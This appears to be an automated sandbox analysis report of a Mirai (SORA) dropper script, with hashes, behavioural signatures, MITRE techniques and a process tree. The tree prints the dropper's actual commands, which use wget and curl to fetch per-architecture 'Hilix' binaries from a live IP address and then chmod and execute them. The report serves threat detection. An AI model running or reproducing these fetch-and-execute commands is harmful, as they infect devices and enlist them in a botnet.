Analysis
-
max time kernel
128s -
max time network
150s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21-02-2025 02:35
Static task
static1
Behavioral task
behavioral1
Sample
40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh
-
Size
1KB
-
MD5
7196d305e319b48d1c38c317b091c7de
-
SHA1
cb78ce3f944836e9d577f9c560e2a8f517980119
-
SHA256
40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0
-
SHA512
a3532d690518b21ffd451a9be324f1484a7a5cc4f5b196b568b5f4b4bf5087aa6a68845555f280a56cbd29ce33db5a82579f2b489dbeb80d7e1615d4e11e9966
Malware Config
Extracted
mirai
SORA
Extracted
mirai
SORA
Extracted
mirai
SORA
Signatures
-
Mirai family
-
Contacts a large (206491) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 670 chmod 682 chmod 763 chmod 773 chmod 778 chmod 748 chmod 768 chmod 787 chmod 796 chmod 807 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/SSH 671 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh /tmp/SSH 683 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh /tmp/SSH 749 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh /tmp/SSH 764 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh /tmp/SSH 769 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh /tmp/SSH 774 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh /tmp/SSH 779 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh /tmp/SSH 788 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh /tmp/SSH 797 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh /tmp/SSH 808 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh -
Modifies Watchdog functionality 1 TTPs 8 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/watchdog SSH File opened for modification /dev/watchdog SSH -
Changes its process name 4 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself eajg1bim11j 779 SSH Changes the process name, possibly in an attempt to hide itself 54c1fe1h2en01bkkm3 788 SSH Changes the process name, possibly in an attempt to hide itself efe3fegp52fooj0kdkd 797 SSH Changes the process name, possibly in an attempt to hide itself i1pc5obbibe4ok 808 SSH -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 673 wget 674 curl 680 cat -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Hilix.x86 wget File opened for modification /tmp/Hilix.arm7 wget File opened for modification /tmp/Hilix.m68k wget File opened for modification /tmp/Hilix.sh4 wget File opened for modification /tmp/Hilix.x86 curl File opened for modification /tmp/Hilix.mips curl File opened for modification /tmp/Hilix.mpsl wget File opened for modification /tmp/Hilix.arm7 curl File opened for modification /tmp/Hilix.m68k curl File opened for modification /tmp/Hilix.sh4 curl File opened for modification /tmp/Hilix.mpsl curl File opened for modification /tmp/Hilix.arm4 curl File opened for modification /tmp/Hilix.arm5 wget File opened for modification /tmp/Hilix.arm5 curl File opened for modification /tmp/Hilix.arm6 curl File opened for modification /tmp/Hilix.ppc wget File opened for modification /tmp/Hilix.ppc curl File opened for modification /tmp/SSH 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh File opened for modification /tmp/Hilix.mips wget File opened for modification /tmp/Hilix.arm6 wget
Processes
-
/tmp/40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh/tmp/40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:637 -
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.x862⤵
- Writes file to tmp directory
PID:639
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:661
-
-
/bin/catcat Hilix.x862⤵PID:669
-
-
/bin/chmodchmod +x 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh Hilix.x86 SSH systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-MAGO2o2⤵
- File and Directory Permissions Modification
PID:670
-
-
/tmp/SSH./SSH Hilix-SSH2⤵PID:671
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:673
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:674
-
-
/bin/catcat Hilix.mips2⤵
- System Network Configuration Discovery
PID:680
-
-
/bin/chmodchmod +x 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh Hilix.mips Hilix.x86 SSH systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-MAGO2o2⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/SSH./SSH Hilix-SSH2⤵PID:683
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.mpsl2⤵
- Writes file to tmp directory
PID:685
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/catcat Hilix.mpsl2⤵PID:746
-
-
/bin/chmodchmod +x 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh Hilix.mips Hilix.mpsl Hilix.x86 SSH systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-MAGO2o2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/SSH./SSH Hilix-SSH2⤵PID:749
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.arm42⤵PID:752
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.arm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/catcat Hilix.arm42⤵PID:762
-
-
/bin/chmodchmod +x 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh Hilix.arm4 Hilix.mips Hilix.mpsl Hilix.x86 SSH systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-MAGO2o2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/SSH./SSH Hilix-SSH2⤵PID:764
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.arm52⤵
- Writes file to tmp directory
PID:765
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:766
-
-
/bin/catcat Hilix.arm52⤵PID:767
-
-
/bin/chmodchmod +x 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh Hilix.arm4 Hilix.arm5 Hilix.mips Hilix.mpsl Hilix.x86 SSH systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-MAGO2o2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/SSH./SSH Hilix-SSH2⤵PID:769
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.arm62⤵
- Writes file to tmp directory
PID:770
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/catcat Hilix.arm62⤵PID:772
-
-
/bin/chmodchmod +x 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.mips Hilix.mpsl Hilix.x86 SSH systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-MAGO2o2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/SSH./SSH Hilix-SSH2⤵PID:774
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.arm72⤵
- Writes file to tmp directory
PID:775
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:776
-
-
/bin/catcat Hilix.arm72⤵PID:777
-
-
/bin/chmodchmod +x 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.mips Hilix.mpsl Hilix.x86 SSH systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-MAGO2o2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/SSH./SSH Hilix-SSH2⤵
- Modifies Watchdog functionality
- Changes its process name
PID:779
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.ppc2⤵
- Writes file to tmp directory
PID:782
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/chmodchmod +x 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.mips Hilix.mpsl Hilix.ppc Hilix.x86 SSH systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-MAGO2o2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/SSH./SSH Hilix-SSH2⤵
- Modifies Watchdog functionality
- Changes its process name
PID:788
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.m68k2⤵
- Writes file to tmp directory
PID:791
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/chmodchmod +x 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.m68k Hilix.mips Hilix.mpsl Hilix.ppc Hilix.x86 SSH systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-MAGO2o2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/SSH./SSH Hilix-SSH2⤵
- Modifies Watchdog functionality
- Changes its process name
PID:797
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.sh42⤵
- Writes file to tmp directory
PID:800
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/chmodchmod +x 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0.sh Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.m68k Hilix.mips Hilix.mpsl Hilix.ppc Hilix.sh4 Hilix.x86 SSH systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-MAGO2o2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/SSH./SSH Hilix-SSH2⤵
- Modifies Watchdog functionality
- Changes its process name
PID:808
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
48KB
MD511863d3338efb145179a0f97dce5b8c1
SHA1f2e14c388fdab6b68d9632190f0cbf6965c955f5
SHA2560621c143e5055a7842daccb78ee3ae12549a089e92a0f350bdade1073b9cce7f
SHA51287e7cc3f4aff9b7fc3e705a4c5225ed2368cf48f4a89a168fbde3ec83cd7580c24c48e6568944d104e895e5b725ecff5056f8e20e823242cb5699bcabe699e08
-
Filesize
71KB
MD5200e03d27fc14205a10f0d5a030475d9
SHA1188c13983b81ed439c8f0cc12039b465ba6616ca
SHA256acd3c8b0b1ca433037786c16fd2445fbf96bc361d95b892504880f96b59c436d
SHA512af4e5976ca65a8d00654e762593a952549cbbb3f70c42540f450a6698b36378c09a2d183692a77233e0c78d92b2774ea7a200babfb5839b30c1cf7dfeafb3c89
-
Filesize
71KB
MD5a23bd973e7ff662a50be1d058902f06c
SHA1d32254694bcf9a61494f3edd1e0d96dd8866af95
SHA2566f4f9d4ee87974712c252118942ab7b2492d016b2655ef0984a8c16aa476dc4e
SHA5125ac13beaa13eaa4d363bc5fd9616c694ce453ae1b458735c642c0bb7f54835a80d2254e6fac48a684e3d3f7d472b1c95adf52b3f568799eedaa6ca8aab9096df
-
Filesize
213B
MD5f87005f796675cc42d01d2c2a0980019
SHA1f86803abb6a20f74faa7d9a5cef4ad4ff35ed7cf
SHA2563da99f8ed6b2499f723f7222634c922c77db0be580762fe1ef49a6933e5dfe7c
SHA5122efd306ad26cdc3d521a203482ab104696fa681663e8268fd8b735e53daac7da3a37087bc3fae814c6e341c805e56aff9a0ebdc9c392546f0d23b916c07a8770
-
Filesize
49KB
MD57dc9ff83da9241b391d19ab5e0c852a2
SHA1990d4884a26640801b7c0798f8b370d90069e6c3
SHA256e27622cb3fa56e1c36aeade1208b57dac065c386de4ebd1723802d373d300a22
SHA512969f54dd3acc3ce702c2ee502044e590c7e8c55b7a9eae52965ef61cb627dbd71e1d083b7e298763a09a83985a2c58d20cf78dcc237586884cc92d613d2aee40
-
Filesize
128KB
MD5e4cfb853d49b335c295f07312a97a0c5
SHA1c547b5df2c22728ce8321eb495597b4cc4920c24
SHA2562d7685d750cb702de3a39d43429fd51b9391f3b70a1724901b464619cb53ea18
SHA512207112452da6f16774817c89e5d47e473396559d03f2885f323fa23cf077d98c6bbbf6a79d3a15f467db8382c56535c3d9befb9386b6d1d7fdf0f3f76efecdae